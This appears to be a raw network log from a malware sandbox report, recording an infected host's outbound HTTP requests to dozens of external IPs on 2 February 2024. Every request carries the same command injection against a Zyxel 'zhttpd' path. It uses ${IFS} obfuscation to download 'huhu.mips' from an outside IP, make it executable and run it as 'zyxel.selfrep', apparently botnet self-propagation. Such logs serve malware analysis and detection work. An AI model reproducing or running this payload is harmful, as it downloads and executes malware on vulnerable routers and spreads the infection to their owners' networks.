                                                        Feb 2, 2024 06:21:29.325892925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9291192.168.2.143421657.125.37.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325923920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9292192.168.2.144524474.162.157.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325973034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9293192.168.2.143422665.209.121.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326010942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9294192.168.2.1454516134.24.216.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326040983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9295192.168.2.143743624.158.148.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326080084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9296192.168.2.1445864111.54.149.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326128006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9297192.168.2.144376097.244.134.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326157093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9298192.168.2.145136245.249.106.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326191902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9299192.168.2.1444692117.24.138.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326227903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9300192.168.2.1436380175.75.19.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326253891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9301192.168.2.1434412223.49.180.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326303005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9302192.168.2.1448528210.79.113.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326327085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9303192.168.2.1448226121.58.139.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326379061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9304192.168.2.1454458112.144.243.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326417923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9305192.168.2.1436630153.93.90.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326493025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9306192.168.2.14369989.83.63.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326533079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9307192.168.2.1451914105.70.252.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326570034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9308192.168.2.1451350141.96.6.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326595068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9309192.168.2.1442072199.207.43.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326622963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9310192.168.2.1452876164.242.131.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326668978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9311192.168.2.14567628.56.122.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326695919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9312192.168.2.1442764170.81.217.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326750040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9313192.168.2.143461673.220.110.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326792002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9314192.168.2.1444650108.228.7.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326824903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9315192.168.2.1442806102.224.107.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326853037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9316192.168.2.144402217.98.17.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326889038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9317192.168.2.1455122177.232.139.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326941013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9318192.168.2.1450470164.133.65.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.326997042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9319192.168.2.143845642.8.119.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327024937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9320192.168.2.144655296.10.245.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327074051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9321192.168.2.1448908109.25.119.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327121019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9322192.168.2.1444900198.239.148.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327171087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9323192.168.2.1456116158.201.184.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327198982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9324192.168.2.1454690112.28.155.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327254057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9325192.168.2.144656245.134.206.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327284098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9326192.168.2.145132012.150.121.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327315092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9327192.168.2.1436620166.186.162.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327366114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9328192.168.2.1448428137.53.188.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327388048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9329192.168.2.1446732141.97.119.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327435017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9330192.168.2.144593881.55.39.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327470064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9331192.168.2.143942267.142.102.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327517033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9332192.168.2.1457088104.1.255.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327552080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9333192.168.2.1459234118.119.89.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327609062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9334192.168.2.1434728203.122.26.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327627897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9335192.168.2.1449968155.165.12.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.327680111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9336192.168.2.1440548155.241.219.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.339891911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9337192.168.2.1448246199.40.0.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.339940071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9338192.168.2.1460714207.173.217.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.339975119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9339192.168.2.1452858210.164.199.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340025902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9340192.168.2.144268051.47.240.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340040922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9341192.168.2.143363848.219.80.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340104103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9342192.168.2.1459192129.20.99.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340145111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9343192.168.2.1459370142.0.235.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340176105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9344192.168.2.1454232173.183.58.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340213060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9345192.168.2.1445704126.186.39.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340250015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9346192.168.2.1444796102.69.92.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340287924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9347192.168.2.1445866139.89.126.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340334892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9348192.168.2.143764647.168.96.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340363979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9349192.168.2.143889239.217.112.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340404034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9350192.168.2.144156096.116.13.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340452909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9351192.168.2.143316678.23.68.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340495110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9352192.168.2.144317287.224.213.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340532064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9353192.168.2.1434320211.41.228.129443
                                                        TimestampBytes transferredDirectionData
